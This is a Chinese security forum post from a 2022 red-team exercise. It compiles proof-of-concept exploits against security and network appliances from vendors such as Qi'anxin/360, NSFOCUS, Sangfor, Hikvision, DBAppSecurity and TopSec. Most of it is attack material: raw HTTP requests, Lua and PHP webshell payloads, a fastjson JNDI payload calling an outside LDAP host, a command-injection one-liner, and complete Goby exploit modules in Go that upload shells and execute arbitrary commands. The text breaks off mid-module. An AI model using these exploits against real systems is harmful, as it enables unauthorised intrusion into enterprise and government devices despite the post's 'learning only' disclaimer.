设为首页收藏本站

DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
DecoyMini 技术交流社区»论坛 技术区 红蓝队对抗 设备漏洞 PoC 整理
返回列表 发新帖
查看: 8506|回复: 0

[2022HW] 设备漏洞 PoC 整理

[复制链接]
吉沃运营专员

172

主题

34

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
339
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理
发表于 2022-8-4 11:58:04 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

1、360 天擎任意文件上传


/api/client_upload_file.json 存在任意文件上传漏洞

  1. POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
  2. 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
  3. Host: 192.168.11.210
  4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
  5. (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  6. Content-Length: 323
  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
  8. Q
  9. Referer: http://192.168.11.210
  10. Accept-Encoding: gzip
  11. ------WebKitFormBoundaryLx7ATxHThfk91oxQ
  12. Content-Disposition: form-data; name="file"; filename="flash.php"
  13. Content-Type: application/xxxx
  14. if ngx.req.get_uri_args().cmd then
  15. cmd = ngx.req.get_uri_args().cmd
  16. local t = io.popen(cmd)
  17. local a = t:read("*all")
  18. ngx.say(a)
  19. end------WebKitFormBoundaryLx7ATxHThfk91oxQ--
复制代码

2、网康科技网关 RCE


/scripts/aitrain.php

3、绿盟下一代防火墙任意文件上传漏洞


resourse.php

  1. package exploits

  3. import (
  4.   "fmt"
  5.   "git.gobies.org/goby/goscanner/goutils"
  6.   "git.gobies.org/goby/goscanner/jsonvul"
  7.   "git.gobies.org/goby/goscanner/scanconfig"
  8.   "git.gobies.org/goby/httpclient"
  9.   "net/url"
  10.   "strings"
  11.   "time"
  12. )

  14. func init() {
  15.   expJson := `{
  16.       "Name": "nsfocus resourse.php arbitrary file upload vulnerability",
  17.       "Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
  18.       "Product": "nsfocus",
  19.   "Homepage": "https://www.nsfocus.com.cn/",
  20.   "DisclosureDate": "2022-07-18",
  21.   "Author": "LittleBlack",
  22.   "FofaQuery": "banner="PHPSESSID_NF" || header="PHPSESSID_NF"",
  23.   "GobyQuery": "banner="PHPSESSID_NF" || header="PHPSESSID_NF"",
  24.   "Level": "3",
  25.       "Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
  26.       "Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
  27.   "References": [
  28.     "https://fofa.so/"
  29.   ],
  30.   "Is0day": false,
  31.   "HasExp": true,
  32.   "ExpParams": [
  33.     {
  34.       "name": "cmd",
  35.       "type": "input",
  36.       "value": "system('id');",
  37.       "show": ""
  38.     }
  39.   ],
  40.   "ExpTips": {
  41.     "Type": "",
  42.     "Content": ""
  43.   },
  44.   "ScanSteps": [
  45.     "AND",
  46.     {
  47.       "Request": {
  48.         "method": "GET",
  49.         "uri": "/test.php",
  50.         "follow_redirect": true,
  51.         "header": {},
  52.         "data_type": "text",
  53.         "data": ""
  54.       },
  55.       "ResponseTest": {
  56.         "type": "group",
  57.         "operation": "AND",
  58.         "checks": [
  59.           {
  60.             "type": "item",
  61.             "variable": "$code",
  62.             "operation": "==",
  63.             "value": "200",
  64.             "bz": ""
  65.           },
  66.           {
  67.             "type": "item",
  68.             "variable": "$body",
  69.             "operation": "contains",
  70.             "value": "test",
  71.             "bz": ""
  72.           }
  73.         ]
  74.       },
  75.       "SetVariable": []
  76.     }
  77.   ],
  78.   "ExploitSteps": [
  79.     "AND",
  80.     {
  81.       "Request": {
  82.         "method": "GET",
  83.         "uri": "/test.php",
  84.         "follow_redirect": true,
  85.         "header": {},
  86.         "data_type": "text",
  87.         "data": ""
  88.       },
  89.       "ResponseTest": {
  90.         "type": "group",
  91.         "operation": "AND",
  92.         "checks": [
  93.           {
  94.             "type": "item",
  95.             "variable": "$code",
  96.             "operation": "==",
  97.             "value": "200",
  98.             "bz": ""
  99.           },
  100.           {
  101.             "type": "item",
  102.             "variable": "$body",
  103.             "operation": "contains",
  104.             "value": "test",
  105.             "bz": ""
  106.           }
  107.         ]
  108.       },
  109.       "SetVariable": []
  110.     }
  111.   ],
  112.    "VulType": [
  113.         "Code Execution"
  114.       ],
  115.       "Tags": [
  116.         "Code Execution"
  117.       ],
  118.   "CVEIDs": [
  119.     ""
  120.   ],
  121.   "CNNVD": [
  122.     ""
  123.   ],
  124.   "CNVD": [
  125.     ""
  126.   ],
  127.   "CVSSScore": "9.5",
  128.   "Translation": {
  129.     "CN": {
  130.       "Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
  131.       "Product": "绿盟下一代防火墙",
  132.       "Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
  133.       "Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新:<a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
  134.       "Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
  135.       "VulType": [
  136.         "代码执⾏"
  137.       ],
  138.       "Tags": [
  139.         "代码执⾏"
  140.       ]
  141.     },
  142.     "EN": {
  143.       "Name": "nsfocus resourse.php 任意文件上传漏洞",
  144.       "Product": "nsfocus",
  145.       "Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
  146.       "Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
  147.       "Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
  148.       "VulType": [
  149.         "Code Execution"
  150.       ],
  151.       "Tags": [
  152.         "Code Execution"
  153.       ]
  154.     }
  155.   },
  156.   "AttackSurfaces": {
  157.     "Application": null,
  158.     "Support": null,
  159.     "Service": null,
  160.     "System": null,
  161.     "Hardware": null
  162.   }
  163. }`

  165.   ExpManager.AddExploit(NewExploit(
  166.     goutils.GetFileName(),
  167.     expJson,
  168.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

  170.       u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
  171.       uri1 := "/api/v1/device/bugsInfo"
  172.       cfg1 := httpclient.NewPostRequestConfig(uri1)
  173.       cfg1.VerifyTls = false
  174.       cfg1.FollowRedirect = false
  175.       cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
  176.       cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"\r\n\r\nlang|s:52:"../../../../../../../../../../../../../../../../tmp/";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
  177.       if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
  178.         time.Sleep(time.Second * 5)
  179.         uri2 := "/api/v1/device/bugsInfo"
  180.         cfg2 := httpclient.NewPostRequestConfig(uri2)
  181.         cfg2.VerifyTls = false
  182.         cfg2.FollowRedirect = false
  183.         cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
  184.         cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name="file"; filename="compose.php"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
  185.         if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
  186.           u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
  187.           uri3 := "/mail/include/header_main.php"
  188.           cfg3 := httpclient.NewPostRequestConfig(uri3)
  189.           cfg3.VerifyTls = false
  190.           cfg3.FollowRedirect = false
  191.           cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
  192.           cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
  193.           cfg3.Data = "1=print+md5%281%29%3B"
  194.           if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
  195.             return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
  196.           }

  198.         }
  199.       }

  201.       return false
  202.     },
  203.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
  204.       cmd := ss.Params["cmd"].(string)

  206.       u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
  207.       uri1 := "/api/v1/device/bugsInfo"
  208.       cfg1 := httpclient.NewPostRequestConfig(uri1)
  209.       cfg1.VerifyTls = false
  210.       cfg1.FollowRedirect = false
  211.       cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
  212.       cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"\r\n\r\nlang|s:52:"../../../../../../../../../../../../../../../../tmp/";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
  213.       if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
  214.         time.Sleep(time.Second * 5)
  215.         uri2 := "/api/v1/device/bugsInfo"
  216.         cfg2 := httpclient.NewPostRequestConfig(uri2)
  217.         cfg2.VerifyTls = false
  218.         cfg2.FollowRedirect = false
  219.         cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
  220.         cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name="file"; filename="compose.php"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
  221.         if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
  222.           u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
  223.           uri3 := "/mail/include/header_main.php"
  224.           cfg3 := httpclient.NewPostRequestConfig(uri3)
  225.           cfg3.VerifyTls = false
  226.           cfg3.FollowRedirect = false
  227.           cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
  228.           cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
  229.           cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
  230.           if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
  231.             expResult.Output = resp3.RawBody
  232.             expResult.Success = true
  233.           }

  235.         }
  236.       }
  237.       return expResult
  238.     },
  239.   ))
  240. }
复制代码

4、深信服 VPN 任意用户添加漏洞


用户管理接口的权限控制出现漏洞,攻击者可任意添加用户

  1. POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=e52021a4c9c962ac9cc647effddcf57242d152d9 HTTP/1.1
  2. Host: xxxxxx
  3. Cookie:language=zh_CN;sinfor_session_id=W730120C88755A7D932019B349CCAC63;PHPSESSID=cb12753556d734509d4092baabfb55dd;x-anti-csrf-gcs=A7DBB1DC0050737E;usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%22-1%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D;hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D
  4. Content-Length: 707
  5. Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
  6. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  7. X-Requested-With: XMLHttpRequest
  8. Sec-Ch-Ua-Mobile: ?0
  9. User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
  10. Sec-Ch-Ua-Platform: "macOS"
  11. Accept: */*
  12. Origin: https://xxxxxx
  13. X-Forwarded-For: 127.0.0.1
  14. X-Originating-Ip: 127.0.0.1
  15. X-Remote-Ip: 127.0.0.1
  16. X-Remote-Addr: 127.0.0.1
  17. Sec-Fetch-Site: same-origin
  18. Sec-Fetch-Mode: cors
  19. Sec-Fetch-Dest: empty
  20. Referer: https://xxxxxx/html/tpl/userMgt.html?userid=0&groupid=-1&createRole=1
  21. Accept-Encoding: gzip, deflate
  22. Accept-Language: zh-CN,zh;q=0.9
  23. Connection: close

  25. name=admin1&note=admin1&passwd=Admin%40123&passwd2=Admin%40123&phone=&grpid=-1&grptext=%2F%E9%BB%98%E8%AE%A4%E7%94%A8%E6%88%B7%E7%BB%84&selectAll=1&b_inherit_auth=1&b_inherit_grpolicy=1&is_Autoip=1&allocateip=0.0.0.0&gqsj=1&ex_time=2027-07-29&is_enable=1&is_public=1&is_pwd=1&first_psw_type=-1&second_server=&auth_type=0&ext_auth_id=&token_svr_id=%E8%AF%B7%E9%80%89%E6%8B%A9&grpolicy_id=0&grpolicytext=%E9%BB%98%E8%AE%A4%E7%AD%96%E7%95%A5%E7%BB%84&roleid=&roletext=&year=&month=&day=&isBindKey=&userid=0&crypto_key=&szcername=&caid=-1&certOpt=0&create_time=&sec_key=&first_psw_name=%E6%9C%AC%E5%9C%B0%E6%95%B0%E6%8D%AE%E5%BA%93&first_psw_id=&second_psw_name=&second_psw_id=&is_extauth=0&secondAuthArr=%5B%5D
复制代码

5、海康威视综合运营管理平台 RCE 漏洞


URL:

  1. /bic/ssoService/v1/applyCT
复制代码

Payload:

  1. {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnstunnel.run","autoCommit":true}}
复制代码

6、安恒明御网关注入


  1. /webui/?g=aaa_portal_auth_config_reset&type=1
复制代码

7、安恒数据大脑 API 网关任意密码重置漏洞


在前端代码中包含重置密码的连接以及密码加密方式

安恒数据大脑 API (https://www.websaas.cn/) 存在任意密码重置漏洞

这里以网站 https://waf-mgmt.pinganyun.com/q/#/ 为例,在前端代码中包含重置密码的连接以及密码加密方式,按照前端代码说明,构造重置密码数据包

此处重置的密码为:p@ssw0rd

  1. POST /q/common-permission/public/users/forgetPassword HTTP/1.1
  2. Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  4. Accept-Language: en-US,en;q=0.5
  5. Content-type: application/json
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Upgrade-Insecure-Requests: 1
  9. Content-Length: 104
  10. {"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use
  11. rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}
复制代码

8、奇安信 天擎安全管理系统 getshell


client_upload_file.json

  1. package exploits

  3. import (
  4.   "fmt"
  5.   "git.gobies.org/goby/goscanner/goutils"
  6.   "git.gobies.org/goby/goscanner/jsonvul"
  7.   "git.gobies.org/goby/goscanner/scanconfig"
  8.   "git.gobies.org/goby/httpclient"
  9.   "strings"
  10. )

  12. func init() {
  13.   expJson := `{
  14.   "Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell",
  15.   "Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.",
  16.   "Product": "360-TianQing",
  17.   "Homepage": "https://www.qianxin.com/product/detail/pid/49",
  18.   "DisclosureDate": "2021-04-09",
  19.   "Author": "itardc@163.com",
  20.   "FofaQuery": "app="360-TianQing"",
  21.   "GobyQuery": "app="360-TianQing"",
  22.   "Level": "3",
  23.   "Impact": "",
  24.   "Recommendation": "",
  25.   "References": [
  26.     "http://fofa.so"
  27.   ],
  28.   "HasExp": true,
  29.   "ExpParams": [
  30.     {
  31.       "name": "cmd",
  32.       "type": "input",
  33.       "value": "whoami"
  34.     }
  35.   ],
  36.   "ExpTips": {
  37.     "Type": "",
  38.     "Content": ""
  39.   },
  40.   "ScanSteps": [
  41.     "AND",
  42.     {
  43.       "Request": {
  44.         "data": "",
  45.         "data_type": "text",
  46.         "follow_redirect": true,
  47.         "method": "GET",
  48.         "uri": "/"
  49.       },
  50.       "ResponseTest": {
  51.         "checks": [
  52.           {
  53.             "bz": "",
  54.             "operation": "==",
  55.             "type": "item",
  56.             "value": "200",
  57.             "variable": "$code"
  58.           }
  59.         ],
  60.         "operation": "AND",
  61.         "type": "group"
  62.       }
  63.     }
  64.   ],
  65.   "ExploitSteps": null,
  66.   "Tags": ["getshell"],
  67.   "CVEIDs": null,
  68.   "CVSSScore": "0.0",
  69.   "AttackSurfaces": {
  70.     "Application": ["360-TianQing"],
  71.     "Support": null,
  72.     "Service": null,
  73.     "System": null,
  74.     "Hardware": null
  75.   }
  76. }`

  78.   ExpManager.AddExploit(NewExploit(
  79.     goutils.GetFileName(),
  80.     expJson,
  81.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
  82.       randomFilename := goutils.RandomHexString(4)
  83.       cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename))
  84.       cfg.VerifyTls = false
  85.       cfg.FollowRedirect = false
  86.       cfg.Header.Store("Referer", u.FixedHostInfo)
  87.       cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
  88.       cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
  89.       cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
  90.       cfg.Data += "Content-Disposition: form-data; name="file"; filename="flash.php"\r\n"
  91.       cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
  92.       cfg.Data += "hello,world\r\n"
  93.       cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
  94.       if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 {
  95.         return strings.Contains(resp.Utf8Html, ""status":true") &&
  96.           strings.Contains(resp.Utf8Html, "upload file success")
  97.       }
  98.       return false
  99.     },
  100.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
  101.       randomFilename := goutils.RandomHexString(4)
  102.       cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename))
  103.       //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC")
  104.       cfg.VerifyTls = false
  105.       cfg.FollowRedirect = false
  106.       cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo)
  107.       cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
  108.       cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
  109.       cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
  110.       cfg.Data += "Content-Disposition: form-data; name="file"; filename="flash.php"\r\n"
  111.       cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
  112.       cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n"
  113.       cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n"
  114.       cfg.Data += "local t = io.popen(cmd)\r\n"
  115.       cfg.Data += "local a = t:read("*all")\r\n"
  116.       cfg.Data += "ngx.say(a)\r\n"
  117.       cfg.Data += "end\r\n"
  118.       cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
  119.       httpclient.DoHttpRequest(expResult.HostInfo, cfg)
  120.       cmd := ss.Params["cmd"].(string)
  121.       if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 {
  122.         expResult.Success = true
  123.         expResult.Output = resp.Utf8Html
  124.       }
  125.       return expResult
  126.     },
  127.   ))
  128. }
复制代码

9、天融信 - 上网行为管理系统 RCE


一句话:

  1. /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
复制代码

Base64 版:

  1. /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-d%20%3E%3E%20/var/www/html/1.php%0a
复制代码

  1. package exploits

  3. import (
  4.   "git.gobies.org/goby/goscanner/goutils"
  5.   "git.gobies.org/goby/goscanner/jsonvul"
  6.   "git.gobies.org/goby/goscanner/scanconfig"
  7.   "git.gobies.org/goby/httpclient"
  8.   "net/url"
  9.   "strings"
  10. )

  12. func init() {
  13.   expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body="ActiveXObject" && body="name=\\"dkey_login\\" " && body="repeat-x left top"","GobyQuery":"body="ActiveXObject" && body="name=\\"dkey_login\\" " && body="repeat-x left top"","Level":"3","Impact":"<p><span style="color: rgb(22, 28, 37); font-size: 16px;">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","Recommendation":"<p><span style="color: rgb(0, 0, 0); font-size: 16px;">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href="https://www.topsec.com.cn/product/27.html" target="_blank">https://www.topsec.com.cn/product/27.html</a></span><br></p>","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"<p>天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。<br></p><p>天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。<br></p>","Recommendation":"<p>目前厂商还未发布安全补丁,请关注官方更新。<a href="https://www.topsec.com.cn/product/27.html" target="_blank">https://www.topsec.com.cn/product/27.html</a></p>","Impact":"<p><span style="color: rgb(22, 28, 37); font-size: 16px;">天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。</span><br></p>","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Recommendation":"<p><span style="color: rgb(0, 0, 0); font-size: 16px;">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href="https://www.topsec.com.cn/product/27.html" target="_blank">https://www.topsec.com.cn/product/27.html</a></span><br></p>","Impact":"<p><span style="color: rgb(22, 28, 37); font-size: 16px;">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}`

  15.   exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool {
  16.     // 攻击 URL
  17.     requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd))
  18.     requestConfig.VerifyTls = false
  19.     requestConfig.FollowRedirect = false
  20.     requestConfig.Timeout = 15

  22.     // 发送攻击请求
  23.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
